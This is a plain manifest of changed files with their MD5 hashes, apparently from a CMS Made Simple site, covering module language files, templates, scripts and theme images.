CHANGED :: ab4029644026271d7ea0bf2394b767ed :: \modules\ModuleManager\lang\ext\hu_HU.php
CHANGED :: 3d3057a98db7dcfbab735524e1eb5923 :: \modules\ModuleManager\lang\ext\it_IT.php
CHANGED :: 88e00b7bc410df103aab58cd05b007a0 :: \modules\ModuleManager\lang\ext\iw_IL.php
CHANGED :: a57069bfa46a7e08d456e043a8280ff4 :: \modules\ModuleManager\lang\ext\ja_JP.php
CHANGED :: 5da726e028e51a8f2989cfe39c803c34 :: \modules\ModuleManager\lang\ext\lt_LT.php
CHANGED :: 43d1607b0013af64b634b243fc136a8e :: \modules\ModuleManager\lang\ext\nb_NO.php
CHANGED :: 68ec26845a4ccc07a2c4767ba7cfb532 :: \modules\ModuleManager\lang\ext\nl_NL.php
CHANGED :: 77cd027ec2f8ae637ec9acef1a80dbf5 :: \modules\ModuleManager\lang\ext\pl_PL.php
CHANGED :: e3fd18b839fe6d4bce853b8eb9f2d5e5 :: \modules\ModuleManager\lang\ext\pt_PT.php
CHANGED :: 8bd9f0aa8bf56bd2713dc0462558af1c :: \modules\ModuleManager\lang\ext\rm_CH.php
CHANGED :: 336045755e7a9af190ea35f645fd01f8 :: \modules\ModuleManager\lang\ext\ro_RO.php
CHANGED :: f5e4f867f4149eb5e5af46a13ae12b16 :: \modules\ModuleManager\lang\ext\ru_RU.php
CHANGED :: 7f52d14933360f1fbc5fb4762b8920f8 :: \modules\ModuleManager\lang\ext\sk_SK.php
CHANGED :: feeb9ee419cf02177ce6314ebef72ead :: \modules\ModuleManager\lang\ext\sl_SI.php
CHANGED :: 1d080324802c780800ca71273c525bad :: \modules\ModuleManager\lang\ext\sr_YU.php
CHANGED :: 3079bbf912f5e729e96abce56f94d7e1 :: \modules\ModuleManager\lang\ext\sv_SE.php
CHANGED :: aa826a0d6b4f0ac7e9db971f49c4c7b5 :: \modules\ModuleManager\lang\ext\tr_TR.php
CHANGED :: beaac46a14dc5a6239eadc14680342c9 :: \modules\ModuleManager\lang\ext\uk_UA.php
CHANGED :: 54e672fe77f5332e9e213579502c4dc6 :: \modules\ModuleManager\lang\ext\zh_TW.php
CHANGED :: 107204e17600302d231179a32abc8e03 :: \modules\ModuleManager\lib\class.modmgr_cached_request.php
CHANGED :: ebf40f1b834dd7cb6ed9abe883b3f5fe :: \modules\ModuleManager\lib\class.modmgr_utils.php
CHANGED :: c84cf9d6245a3ce7e6740d5713a9dfc4 :: \modules\ModuleManager\lib\class.ModuleManagerModuleInfo.php
CHANGED :: 6dd9ddbbe33567bf36234220cb99169d :: \modules\ModuleManager\lib\class.modulerep_client.php
CHANGED :: 3c797a833535856d0b7d1fe987cbd677 :: \modules\ModuleManager\ModuleManager.module.php
CHANGED :: 64ce240fcd3a34f2027516ccbeb5190c :: \modules\ModuleManager\templates\adminpanel.tpl
CHANGED :: f5f9dea6675a04898299b02647894ee6 :: \modules\ModuleManager\templates\adminprefs.tpl
CHANGED :: 9840fd2a660968aa4c72380cc4fddabb :: \modules\ModuleManager\templates\admin_installed.tpl
CHANGED :: 94b93abb289cd25d1a0436f6e18d81e2 :: \modules\ModuleManager\templates\admin_search_tab.tpl
CHANGED :: b18bb01b0c855acc5037a6da3281303c :: \modules\ModuleManager\templates\display_install_results.tpl
CHANGED :: d1cd59ed4f47b4c7e0012ea605efdc71 :: \modules\ModuleManager\templates\error.tpl
CHANGED :: 202a6cbe833ee26b71dc7b4daf2ca46f :: \modules\ModuleManager\templates\installinfo.tpl
CHANGED :: 85dd176338512768f3a67477b1db5f3b :: \modules\ModuleManager\templates\local_about.tpl
CHANGED :: 12c109462c5b8d8d76d00e37b6272e6e :: \modules\ModuleManager\templates\local_help.tpl
CHANGED :: 9054b970892d5859ff34f064e515d130 :: \modules\ModuleManager\templates\local_missingdeps.tpl
CHANGED :: a2136a1228433c09086dc58a345f1a3c :: \modules\ModuleManager\templates\local_uninstall.tpl
CHANGED :: 7678343fd137b965df4bb0b62f6b1086 :: \modules\ModuleManager\templates\newversionstab.tpl
CHANGED :: b284cc49af94beebd42e822f1878d9da :: \modules\ModuleManager\templates\postinstall.tpl
CHANGED :: a679ae26d019bc0370e285ef3e29d458 :: \modules\ModuleManager\templates\remotecontent.tpl
CHANGED :: aae0f95ad7e6f0d87cc4ebd00e71c68e :: \modules\ModuleManager\templates\showmodule.tpl
CHANGED :: 27763f46340f3b63d70ad1b9c6d179eb :: \modules\Navigator\action.breadcrumbs.php
CHANGED :: fe25b02e6352279c3fe43977f90647a7 :: \modules\Navigator\action.default.php
CHANGED :: 00da815bc1244e0eeba01372f82d1627 :: \modules\Navigator\changelog.inc
CHANGED :: d6646625430d2421fb6e48c4d0787318 :: \modules\Navigator\doc\tpltype_breadcrumbs.inc
CHANGED :: 305b1c26e975f787a589969d5d1aad48 :: \modules\Navigator\doc\tpltype_navigation.inc
CHANGED :: ee0eb8b47e3c3c47ed963689123176f6 :: \modules\Navigator\lang\en_US.php
CHANGED :: e1a8d61f9c8ae991f96f1c4445b6a218 :: \modules\Navigator\lang\ext\da_DK.php
CHANGED :: 5228c8734022e6bca1525a85de0e7880 :: \modules\Navigator\lang\ext\de_DE.php
CHANGED :: 6454dcf4e39b908705579220182ade23 :: \modules\Navigator\lang\ext\fr_FR.php
CHANGED :: 90975f21f3af4ae786fa605e1c6ddb21 :: \modules\Navigator\lang\ext\it_IT.php
CHANGED :: 271d572d65785b53b1d911a4cd5a3c15 :: \modules\Navigator\lang\ext\nb_NO.php
CHANGED :: fca82dc43db7fb706d7e214bfc122c3e :: \modules\Navigator\lang\ext\nl_NL.php
CHANGED :: 9c30e28c637503fe197bb8639d94b9c6 :: \modules\Navigator\lang\ext\ru_RU.php
CHANGED :: 2a89e1163b3498ac4a9e61419777e02a :: \modules\Navigator\lang\ext\sr_YU.php
CHANGED :: 8da12eeb87361b9d97fe643ae6595189 :: \modules\Navigator\lang\ext\tr_TR.php
CHANGED :: 0f94cf892d80a1105fa54ab38d71e07c :: \modules\Navigator\lang\ext\uk_UA.php
CHANGED :: 0d84ac29467313a0c0195114bd797545 :: \modules\Navigator\lang\ext\zh_TW.php
CHANGED :: a44bf6da7647ad8e2f862afc081cc058 :: \modules\Navigator\lib\class.Nav_utils.php
CHANGED :: b0accbe84c85a1cb16da91830619f26c :: \modules\Navigator\method.install.php
CHANGED :: d6905da8a496593c52817985e9fa2119 :: \modules\Navigator\method.uninstall.php
CHANGED :: 0eba5fe918b8cfd8a7503b9adba5ac9b :: \modules\Navigator\method.upgrade.php
CHANGED :: 3fe785be4fa03b388ac9681c11bb77ab :: \modules\Navigator\Navigator.module.php
CHANGED :: 5422fe3f8d901684894454a9da82b908 :: \modules\Navigator\templates\cssmenu.tpl
CHANGED :: 3f2ae1aac03f663b34a355e1bf286477 :: \modules\Navigator\templates\cssmenu_ulshadow.tpl
CHANGED :: d83e7e687b2e5eb0d42a5281f992bb4a :: \modules\Navigator\templates\dflt_breadcrumbs.tpl
CHANGED :: 86124869c18b62c6e1211cb2318f9651 :: \modules\Navigator\templates\minimal_menu.tpl
CHANGED :: 08509b89c7f14b4f2412c63d29b0b406 :: \modules\Navigator\templates\Simplex_Footer_Navigation.tpl
CHANGED :: f35cd581d13373dddca36b486abb8f42 :: \modules\Navigator\templates\Simplex_Main_Navigation.tpl
CHANGED :: bdde1ec9811955b09e52165e67ba6429 :: \modules\Navigator\templates\simple_navigation.tpl
CHANGED :: dd59aa45f32f03a6abb85eb1c2d1e29f :: \modules\News\action.addarticle.php
CHANGED :: 22f7a077a29f2d0d53826e5af7532ba4 :: \modules\News\action.addcategory.php
CHANGED :: 0dc6f47344cea166b469ad02c5fb647a :: \modules\News\action.admin_addfielddef.php
CHANGED :: 48c0f2e094579d8edef6623db08dbebf :: \modules\News\action.admin_deletefielddef.php
CHANGED :: 323425c62228d787c8d0c065796560fa :: \modules\News\action.admin_editfielddef.php
CHANGED :: 867ff536c52ed1b99345b5bf1e9605a6 :: \modules\News\action.admin_movefielddef.php
CHANGED :: 2ee9ccc71091aed1b614dbc9ee0ad280 :: \modules\News\action.admin_reorder_cats.php
CHANGED :: c318b83cc7e76717bf2f8232c9eb5a3b :: \modules\News\action.admin_settings.php
CHANGED :: 1cb8cabe40bac14737df4cd3b04c2d7d :: \modules\News\action.approvearticle.php
CHANGED :: 84f6a6d78db8f8d4a917d5b6703c846a :: \modules\News\action.browsecat.php
CHANGED :: 7fcdbd120b3d6bb6833f8bd7dab38394 :: \modules\News\action.default.php
CHANGED :: 3ff9e551bbf1d15d1d72559b61430f7f :: \modules\News\action.defaultadmin.php
CHANGED :: 980a231d9e9226cdd5e88fbb28203b5b :: \modules\News\action.defaulturl.php
CHANGED :: 35008f6b660e4c1312a491caf08a9db8 :: \modules\News\action.deletearticle.php
CHANGED :: 630b2d50d8e82938da7c65918354762d :: \modules\News\action.deletecategory.php
CHANGED :: 9568f3e0b4192aa9b70987ad0b3304d6 :: \modules\News\action.detail.php
CHANGED :: ad7ce3fa21d8b62fbd0732b441fddf68 :: \modules\News\action.editarticle.php
CHANGED :: a638f04007d3371b2d4466643b29d8a1 :: \modules\News\action.editcategory.php
CHANGED :: d4ce7479bc3bc752928a6fad9408be29 :: \modules\News\action.fesubmit.php
CHANGED :: c4b77f19b3b644cfb038974b67dbac77 :: \modules\News\action.updateoptions.php
CHANGED :: 3e9418df0d25979934434cf9bffb0cf0 :: \modules\News\changelog.inc
CHANGED :: b2073227516c84824413ccddf52544dd :: \modules\News\doc\tpltype_browsecat.inc
CHANGED :: a4b154615be0fcd01cce4197afd8edfe :: \modules\News\doc\tpltype_detail.inc
CHANGED :: aa7e57d7f273e909b7d0892d187f5c71 :: \modules\News\doc\tpltype_form.inc
CHANGED :: 3bb3c27f9c40f1233b5701b9544f0e12 :: \modules\News\doc\tpltype_summary.inc
CHANGED :: 7eaa9a9ec4ce86c5969fb85ec593aae5 :: \modules\News\function.admin_articlestab.php
CHANGED :: 940e20e92416bbc8f7d095ecfaec439b :: \modules\News\function.admin_categoriestab.php
CHANGED :: af76991dbd8c1a565692f1c0b482b0b3 :: \modules\News\function.admin_customfieldstab.php
CHANGED :: cb8a8c92df5a094432eac83ac9a94be2 :: \modules\News\function.admin_optionstab.php
CHANGED :: 51e003d49a8d0dd77ece45ecda15a0d5 :: \modules\News\images\icon.gif
CHANGED :: 30cbbc4eedb7889a5b5b7e42634a7a59 :: \modules\News\images\icon.png
CHANGED :: a6bf725fffa3ea7c1249af668600a904 :: \modules\News\lang\en_US.php
CHANGED :: de2653453b4681ec16170356179bb097 :: \modules\News\lang\ext\ar_AR.php
CHANGED :: dc12f0b0b091eff8282655ea2bd8fa0c :: \modules\News\lang\ext\bg_BG.php
CHANGED :: 77863102991396a8a6e1a7614a57e95b :: \modules\News\lang\ext\ca_ES.php
CHANGED :: 32f087ed434f5e0638cf51031918cfad :: \modules\News\lang\ext\cs_CZ.php
CHANGED :: cff149ebc4b31b65f730d9d09ce82480 :: \modules\News\lang\ext\da_DK.php
CHANGED :: 0d120f9c7fe26622b43804b235bf9ce6 :: \modules\News\lang\ext\de_DE.php
CHANGED :: 6def6f6e8c825d8e5c76696376a59cfa :: \modules\News\lang\ext\el_GR.php
CHANGED :: c7ccfac7831d933279c0276095a73625 :: \modules\News\lang\ext\en_CY.php
CHANGED :: 7ff502a3efdc99018ad939126d406c68 :: \modules\News\lang\ext\es_ES.php
CHANGED :: d8d7df2c48dada4951c4a33c128b3baa :: \modules\News\lang\ext\et_EE.php
CHANGED :: 257ee9e769067b0f5599807ae20a551e :: \modules\News\lang\ext\eu_ES.php
CHANGED :: aba6b7ff0e5994afa3f39c5943fb0709 :: \modules\News\lang\ext\fa_FA.php
CHANGED :: aba6b7ff0e5994afa3f39c5943fb0709 :: \modules\News\lang\ext\fa_IR.php
CHANGED :: 605e16ff65e7ffe79b6174c323c0642d :: \modules\News\lang\ext\fi_FI.php
CHANGED :: 4399e5e8a01424f12963cf0a85643991 :: \modules\News\lang\ext\fr_FR.php
CHANGED :: 12bb85853929a713d218e0ffe71c0b95 :: \modules\News\lang\ext\hr_HR.php
CHANGED :: 80ff762cec06e038afe43a6ec39300c7 :: \modules\News\lang\ext\hu_HU.php
CHANGED :: f4a7a6ee2efada7b6cf691a1ca350fad :: \modules\News\lang\ext\id_ID.php
CHANGED :: 87c3bbf01cedfdf95baade5a64f2ec88 :: \modules\News\lang\ext\it_IT.php
CHANGED :: 47421611e1938c3225ffb6a91fecbf78 :: \modules\News\lang\ext\iw_IL.php
CHANGED :: a080ff9731e8f730fde8cf2caa890500 :: \modules\News\lang\ext\ja_JP.php
CHANGED :: c74c548f1b3bb62209d8d8b805eeaea0 :: \modules\News\lang\ext\lt_LT.php
CHANGED :: 394ff35bfca66d9076a67f02c9db8550 :: \modules\News\lang\ext\mn_MN.php
CHANGED :: 80c4379b4f7562c9354f2513004bd2cf :: \modules\News\lang\ext\nb_NO.php
CHANGED :: 79be87ac9b4cd9711c0e088aae9010f7 :: \modules\News\lang\ext\nl_NL.php
CHANGED :: 90d1b9243254f178340af895c7813524 :: \modules\News\lang\ext\pl_PL.php
CHANGED :: adb159091b2c5baa5ea4a5eea02d4a93 :: \modules\News\lang\ext\pt_BR.php
CHANGED :: c6d05877b62e7df85028eb0d0fc5447f :: \modules\News\lang\ext\pt_PT.php
CHANGED :: 0d40f82b97e1016073fabffc6e17f28d :: \modules\News\lang\ext\ro_RO.php
CHANGED :: a692aa0b7788c7f77ca3ba00ccf76061 :: \modules\News\lang\ext\ru_RU.php
CHANGED :: 6bf46ffeaa54b2cae92a89bbf9271a9b :: \modules\News\lang\ext\sk_SK.php
CHANGED :: 703fd9d7ef778b9087819b5d84924aca :: \modules\News\lang\ext\sl_SI.php
CHANGED :: 5281804f989c2109bd3ee9dc6eff7428 :: \modules\News\lang\ext\sr_YU.php
CHANGED :: b186aaf95d823a110b134f3b4910b331 :: \modules\News\lang\ext\sv_SE.php
CHANGED :: 88ba309f6761390e37485cac6adfd86a :: \modules\News\lang\ext\tr_TR.php
CHANGED :: 598f0a28dacc019182e7ef19dcb39943 :: \modules\News\lang\ext\uk_UA.php
CHANGED :: c7ccfac7831d933279c0276095a73625 :: \modules\News\lang\ext\vi_VN.php
CHANGED :: 7bab47fcfeb29b54c7b06fc3182fcfa6 :: \modules\News\lang\ext\zh_CN.php
CHANGED :: e6a984b4c3302764e15e56c1b88ba847 :: \modules\News\lang\ext\zh_TW.php
CHANGED :: 4f3a07bb8ca6ffcb233e352929b54ea7 :: \modules\News\lib\class.CreateDraftAlertTask.php
CHANGED :: 500da3fb55613d0e0677ebd72159ec0c :: \modules\News\lib\class.DraftMessageAlert.php
CHANGED :: cac4bd345eed3c03f14e8be0051a1231 :: \modules\News\lib\class.News_AdminSearch_slave.php
CHANGED :: 55a592b8140b447aa80e22e15bcb7a39 :: \modules\News\lib\class.news_admin_ops.php
CHANGED :: 4ad70b6bc70336dcef989ca9017cdd60 :: \modules\News\lib\class.news_article.php
CHANGED :: 9e2995d9c14d33a421e1519557b54c01 :: \modules\News\lib\class.news_field.php
CHANGED :: 86256a01ecc5fd24ec2ea69829eba114 :: \modules\News\lib\class.news_ops.php
CHANGED :: 553a98b5c65bfe5bb40b9bbb9a4bca5f :: \modules\News\method.install.php
CHANGED :: dd65979ebc6460ed4f54d1c88f0a0d82 :: \modules\News\method.uninstall.php
CHANGED :: 1f73bbd16a37c180191a546a71444389 :: \modules\News\method.upgrade.php
CHANGED :: d351446ac069a30ece5ee275e8e86969 :: \modules\News\News.module.php
CHANGED :: 550c75cc6219dbe69091d9002817b705 :: \modules\News\templates\adminprefs.tpl
CHANGED :: 3268222334c2951856fd4ab1eef5fc61 :: \modules\News\templates\admin_reorder_cats.tpl
CHANGED :: 9f13ddd8dee9b3bb1e23cb0fa47a4a7f :: \modules\News\templates\articlelist.tpl
CHANGED :: c3b7d733a3a55a36e1d4e95616ad7331 :: \modules\News\templates\browsecat.tpl
CHANGED :: d54e2b730026a4f22ce624a448c9c611 :: \modules\News\templates\categorylist.tpl
CHANGED :: 052db6f31136385aeeee377a70754401 :: \modules\News\templates\customfieldstab.tpl
CHANGED :: 34e7537c55eb79458df59e379a1ad282 :: \modules\News\templates\editarticle.tpl
CHANGED :: 6fdf20dda47b1a182b4636896e010582 :: \modules\News\templates\editcategory.tpl
CHANGED :: 6d66a9103d05e6b307d7de49bc719d87 :: \modules\News\templates\editdefaulttemplate.tpl
CHANGED :: 05045100edd2398a467ef0cc11a695f0 :: \modules\News\templates\editfielddef.tpl
CHANGED :: ce94d36143412c6ecfd3efd8eb110c70 :: \modules\News\templates\edittemplate.tpl
CHANGED :: e3ffbf0926a09f30bec1627cd54e8516 :: \modules\News\templates\edittemplates.tpl
CHANGED :: a24c29397d18002b7308fde96d958e51 :: \modules\News\templates\orig_detail_template.tpl
CHANGED :: cf5eadd0c4d6e066355b0767d4a339cd :: \modules\News\templates\orig_form_template.tpl
CHANGED :: 3455ee56f25cbb96c5d2244e65eddd33 :: \modules\News\templates\orig_summary_template.tpl
CHANGED :: 9e2d409f43289c4198ce7e9477a499e5 :: \modules\News\templates\Simplex_Detail_template.tpl
CHANGED :: 5bffb703da52bed3088cbc578f831abd :: \modules\News\templates\Summary_Simplex_template.tpl
CHANGED :: 3761f2b506e42aaf25bd661bd0e52b15 :: \modules\Search\action.default.php
CHANGED :: ce09cd07e02818570fa466addd9b63c7 :: \modules\Search\action.defaultadmin.php
CHANGED :: 4b0d3dc6f13b75b801c6fe9df0efc614 :: \modules\Search\action.dosearch.php
CHANGED :: e2cfa22d58d403d20a72ccdb8beb6723 :: \modules\Search\action.keywords.php
CHANGED :: 443652646da43bbd48d817daa23c4cb8 :: \modules\Search\changelog.inc
CHANGED :: 162ad6c23b8e1269a95d6072f45b5356 :: \modules\Search\function.admin_statistics_tab.php
CHANGED :: 09724f7c4f1398dbd513c2c0ad66b3e5 :: \modules\Search\images\icon.gif
CHANGED :: 83ff25c7202f78fc11b84586e06bc2b7 :: \modules\Search\images\icon.png
CHANGED :: a17fda07f7e0107346ee5f919b6dfd33 :: \modules\Search\lang\en_US.php
CHANGED :: 48325646554d933e36a96eb700a2a6b3 :: \modules\Search\lang\ext\af_ZA.php
CHANGED :: 17c750efda6df5a124c94a468d21c5d6 :: \modules\Search\lang\ext\ar_AR.php
CHANGED :: 569a2c054f52f37a5dcdafba0e01cd73 :: \modules\Search\lang\ext\bg_BG.php
CHANGED :: 6126834e607148cfd831a43a4b0ffa41 :: \modules\Search\lang\ext\cs_CZ.php
CHANGED :: 110e1b8daa106b0d5815d9cf7cbf12ef :: \modules\Search\lang\ext\da_DK.php
CHANGED :: 59f46c059aaeae54356963bf866d22e9 :: \modules\Search\lang\ext\de_DE.php
CHANGED :: cbcfa98f896b808f99b52c12fce8feba :: \modules\Search\lang\ext\el_GR.php
CHANGED :: 2e8317c789058805b615772941a82f23 :: \modules\Search\lang\ext\en_CY.php
CHANGED :: bc0ba4c5de20f93e385bb27f59307368 :: \modules\Search\lang\ext\es_ES.php
CHANGED :: f816e580202d7e66ee0261792e06869a :: \modules\Search\lang\ext\et_EE.php
CHANGED :: c210e03872e5a7e09dc8bcc87d324893 :: \modules\Search\lang\ext\eu_ES.php
CHANGED :: dcf22ddf5a9d1c70cc5c836846496770 :: \modules\Search\lang\ext\fa_FA.php
CHANGED :: bd2eede546a2260490054bb1381837c1 :: \modules\Search\lang\ext\fa_IR.php
CHANGED :: 889cad9908527f660aaa5e200e334e63 :: \modules\Search\lang\ext\fi_FI.php
CHANGED :: 5293fd6f976465bfab0d19413d688b58 :: \modules\Search\lang\ext\fr_FR.php
CHANGED :: 622ac423ae28ad1b9ecfad619d5cf1ac :: \modules\Search\lang\ext\hr_HR.php
CHANGED :: eb1823f75804facf13cda258e5ce786d :: \modules\Search\lang\ext\hu_HU.php
CHANGED :: 7364e47e0c53737e4d454f6a40c1915a :: \modules\Search\lang\ext\id_ID.php
CHANGED :: f33c0b6425c2659ac5f0c6c1b75d3df3 :: \modules\Search\lang\ext\it_IT.php
CHANGED :: af62296cb41eec8a22b26f965bc587dc :: \modules\Search\lang\ext\iw_IL.php
CHANGED :: a37fef47405b2e30e0b84d5216cb5469 :: \modules\Search\lang\ext\ja_JP.php
CHANGED :: e0dfb3947a397aa7acc16ae4c3234af1 :: \modules\Search\lang\ext\lt_LT.php
CHANGED :: dc453b462f36a3b694982f0a4ad01508 :: \modules\Search\lang\ext\nb_NO.php
CHANGED :: 9f757e7c529c9c86001c66df47dc6f3f :: \modules\Search\lang\ext\nl_NL.php
CHANGED :: 508f81d2612f60f0285adfb5be0556ef :: \modules\Search\lang\ext\pl_PL.php
CHANGED :: 4f896bcc98e4cd905d28ef17acf98636 :: \modules\Search\lang\ext\pt_BR.php
CHANGED :: e417cdf7a747e3b7357debae56532299 :: \modules\Search\lang\ext\pt_PT.php
CHANGED :: e93c6f3571b3ed72c6df5ae9843660e3 :: \modules\Search\lang\ext\rm_CH.php
CHANGED :: a6b0946f339472d4adce57eda6e41843 :: \modules\Search\lang\ext\ro_RO.php
CHANGED :: d9546932144a9d05656c108eb884822b :: \modules\Search\lang\ext\ru_RU.php
CHANGED :: 3dc5dd700f6dabacb4d2ba0d38d73244 :: \modules\Search\lang\ext\sk_SK.php
CHANGED :: a6f78b2f02387d3bc0dbca0e2a56d16e :: \modules\Search\lang\ext\sl_SI.php
CHANGED :: fa6e5203a4b8f7eda0f589b45f71c98c :: \modules\Search\lang\ext\sr_YU.php
CHANGED :: 745a0820fe7eec3a0e5add6273fcb6e9 :: \modules\Search\lang\ext\sv_SE.php
CHANGED :: 148f9d3734ddab9040796cb9ac6d1981 :: \modules\Search\lang\ext\tr_TR.php
CHANGED :: a4c1956c243aa348b85757bc7b058d6b :: \modules\Search\lang\ext\uk_UA.php
CHANGED :: 6d5aa247427722a595a7b813b918bb62 :: \modules\Search\lang\ext\zh_TW.php
CHANGED :: fb16fa29d330c77357b4b86c60014ffc :: \modules\Search\method.install.php
CHANGED :: 91cfa278f0114e0fa87a317c603261f7 :: \modules\Search\method.uninstall.php
CHANGED :: c2194232ed91d7a6b2fa6c763561a6af :: \modules\Search\method.upgrade.php
CHANGED :: 820497a760e3cfc73a10689e2f8ddde7 :: \modules\Search\PorterStemmer.class.php
CHANGED :: 7c2191df5ce07a85954696f8fdd7a254 :: \modules\Search\Search.module.php
CHANGED :: faada7a15e6ec95cd461e82b20d75fe6 :: \modules\Search\search.tools.php
CHANGED :: eeac592409cf57e0e7b21d67645b4206 :: \modules\Search\templates\admin_statistics_tab.tpl
CHANGED :: 7cd420c4e58bdbaea8762bd7881e0228 :: \modules\Search\templates\options_tab.tpl
CHANGED :: 8d02bbdf06d00d0532b5567b2ab99ce2 :: \modules\Search\templates\Simplex_Search_template.tpl
CHANGED :: 1590e9c44405c7b3a2980d4a9630d6f3 :: \uploads\images\logo1.gif
CHANGED :: 7dbdc2c6585f16b2bbfd7fcae5f33e9a :: \uploads\images\thumb_logo1.gif
CHANGED :: f431f4e7bbc5d9e9022f69f25b828b65 :: \uploads\NCleanBlue\arrow.gif
CHANGED :: c2ebc3c2f0668e4e517f36be1c290610 :: \uploads\NCleanBlue\bg__content.png
CHANGED :: 74bdf8852d0a7768f9fde6565336dcc2 :: \uploads\NCleanBlue\bg__footer.png
CHANGED :: de91929b9ea8403e4e6f32df47b60305 :: \uploads\NCleanBlue\bg__full.png
CHANGED :: 7fa1fa034ae9850c499283ecb9c97c0d :: \uploads\NCleanBlue\bull.png
CHANGED :: dd263a121e7860e0e1121fe6992f0659 :: \uploads\NCleanBlue\external.gif
CHANGED :: 57ee2d36557e167776225f8a82b84694 :: \uploads\NCleanBlue\js\ie6fix.js
CHANGED :: 3d045b93716ed28dc745e648b3428a26 :: \uploads\NCleanBlue\js\transparent.gif
CHANGED :: 49d7a66f2c0d30bde5cc04367ad8e9ff :: \uploads\NCleanBlue\logo.png
CHANGED :: 55b4ce1493412b1c0b80c9a33e491d9b :: \uploads\NCleanBlue\screen-1.6.jpg
CHANGED :: 7f28cb75919576e785b11ebbe80de066 :: \uploads\NCleanBlue\search.png
CHANGED :: cb2cce6665bc34159214863cdd1e7880 :: \uploads\NCleanBlue\tabs.gif
CHANGED :: 9ed2d87b3933e2ce1f611d569ceb5c2a :: \uploads\NCleanBlue\ulbtm.gif
CHANGED :: 30d7c85e16f7db6a82cce6ff69387a95 :: \uploads\NCleanBlue\ulbtm.png
CHANGED :: 36a9572bc8ba5b236e561e1fed05bd41 :: \uploads\NCleanBlue\ultop.gif
CHANGED :: 458632bcf14fbff86f646acaa437ec1b :: \uploads\NCleanBlue\ultop.png
CHANGED :: 4f9b8200906df8efa0d7ce1324b71233 :: \uploads\NCleanBlue\version.png
CHANGED :: 5564000a7e85072501632a336764d2c4 :: \uploads\ngrey\active.gif
CHANGED :: 64655f1f6f0d494595648aaad994938a :: \uploads\ngrey\active.png
CHANGED :: c0eb97c5d75775b5852426f2d019858a :: \uploads\ngrey\bg_banner.png
CHANGED :: 343e66eb4b69bdd9f78776adaf40d248 :: \uploads\ngrey\body.png
CHANGED :: 08cda11fcc41fd577061e30931caffd1 :: \uploads\ngrey\darknav.png
CHANGED :: 58b480a0627fcf679a00f6d610403adf :: \uploads\ngrey\dot.gif
CHANGED :: dd263a121e7860e0e1121fe6992f0659 :: \uploads\ngrey\external.gif
CHANGED :: fbc67322903b04daf448f128e6013c1c :: \uploads\ngrey\libk.gif
CHANGED :: 42e142b3e4ccb1a06adab8d7e57456f9 :: \uploads\ngrey\liup.gif
CHANGED :: 49a6d14aa1445235b74989ab52e20667 :: \uploads\ngrey\logoCMS.png
CHANGED :: 15451ea4eddd48b62cf34b1e31b0cf6d :: \uploads\ngrey\mainleft1.gif
CHANGED :: 8976b2f049cb1b27bf48c72ba5f049cb :: \uploads\ngrey\mainleftup.gif
CHANGED :: 92f2d376933b75ec7c4a0ef081050841 :: \uploads\ngrey\mainrt.gif
CHANGED :: 1763c6cbd2565cb0d56803fceaf2883f :: \uploads\ngrey\mainrt1.gif
CHANGED :: cd1daaef2171622b7dd7dc90918263fb :: \uploads\ngrey\mainrtup.gif
CHANGED :: ea224299e080e78d571ef63e3c4deb19 :: \uploads\ngrey\nav.png
CHANGED :: a63bc943d7cc04574e0ae84a6b1e9bca :: \uploads\ngrey\navlefttest.gif
CHANGED :: 55e892383af4a5d069d0a6c1d7562cfc :: \uploads\ngrey\navrttest.gif
CHANGED :: c2456a0903fb510f62aac8d7a87ba438 :: \uploads\ngrey\parent.gif
CHANGED :: c82413bc959d91e8607e6246e54c867f :: \uploads\ngrey\parent.png
CHANGED :: df5cc2e00ee04482d72701d0313834cf :: \uploads\ngrey\rtup.gif
CHANGED :: 285923d0c4308ff89bb0e6b5365e838f :: \uploads\ngrey\search.gif
CHANGED :: d6e4f0b39bf67842d4a0f19157031a62 :: \uploads\ngrey\ulbtmrt.gif
CHANGED :: 8f40e03f7fae8883a9601f4ba1295dbd :: \uploads\ngrey\ulbtmrt.png
CHANGED :: 7aeaa0505ae87049b24881c0da532469 :: \uploads\ngrey\ultop.gif
CHANGED :: 1106fb48320e2d0195855fecf649c72a :: \uploads\ngrey\ultoprt.gif
CHANGED :: ad0dd734e5d3535ace3c335c3a78dc87 :: \uploads\ngrey\ultoprt.png
CHANGED :: d1b49be7c2dd512a4b791acbb7bbcf80 :: \uploads\ngrey\ultopup.gif
CHANGED :: 6ab56b440e463a934b0cac5540aee259 :: \uploads\ngrey\ultopup.png
CHANGED :: 2a89443605fb31a869e3b8cb71ed82c8 :: \uploads\ngrey\wbtmleft.gif
CHANGED :: f2553d4e5d8f87966d6bb6f01473a00c :: \uploads\ngrey\wfootrt.gif
CHANGED :: b9761496bd8d0df71b42b078f3d57d97 :: \uploads\ngrey\wtopleft.gif
CHANGED :: 0714f6ae0861b9b74a6ca95bd4d84773 :: \uploads\simplex\fonts\simplex.eot
CHANGED :: 97f78f6cc88515db8e8e262d69bee8ab :: \uploads\simplex\fonts\simplex.svg
CHANGED :: 9bebd05e044460d849212c5eaeac813f :: \uploads\simplex\fonts\simplex.ttf
CHANGED :: 48007ad6e7f575899db9067b5590df5c :: \uploads\simplex\fonts\simplex.woff
CHANGED :: b637be266f720028a727025e05568c4d :: \uploads\simplex\images\body-background.png
CHANGED :: 37255f6e62b8e72471fbe845f69d13ce :: \uploads\simplex\images\cmsmadesimple-logo.png
CHANGED :: 8f7590ad8cd4c89e71d19d18532e1e70 :: \uploads\simplex\images\icons\cmsms-120x120.png
CHANGED :: ec2ba5029e06372ab2b6bc5cf0d2ef01 :: \uploads\simplex\images\icons\cmsms-152x152.png
CHANGED :: 551e34acf2930bf083670fa203420993 :: \uploads\simplex\images\icons\cmsms-196x196.png
CHANGED :: 4c2bab242b8ce19bfc4b50b1235eb86c :: \uploads\simplex\images\icons\cmsms-60x60.png
CHANGED :: f38533379feea9f165c09fd3277f3a5f :: \uploads\simplex\images\icons\cmsms-76x76.png
CHANGED :: ebf500d206705bda0cb79021c15da98a :: \uploads\simplex\images\icons\favicon_cms.ico
CHANGED :: a2948d74b6cdba3b2fb406bd5b09a83a :: \uploads\simplex\images\palm-circle.png
CHANGED :: 4f123c8303d0644e43beffc95f75e4c7 :: \uploads\simplex\js\functions.js
CHANGED :: fb579808a2e285e7e3419f42b7e07a43 :: \uploads\simplex\js\functions.min.js
CHANGED :: 40c932dac4eab54b947cf4e5f134829e :: \uploads\simplex\js\jquery.sequence-min.js
CHANGED :: fd377c66d907f8981cf867ce9cd78b93 :: \uploads\simplex\js\touchr.js
CHANGED :: 9494acf1f200a994b787de77b2f0f250 :: \uploads\simplex\teaser\browser-scene.png
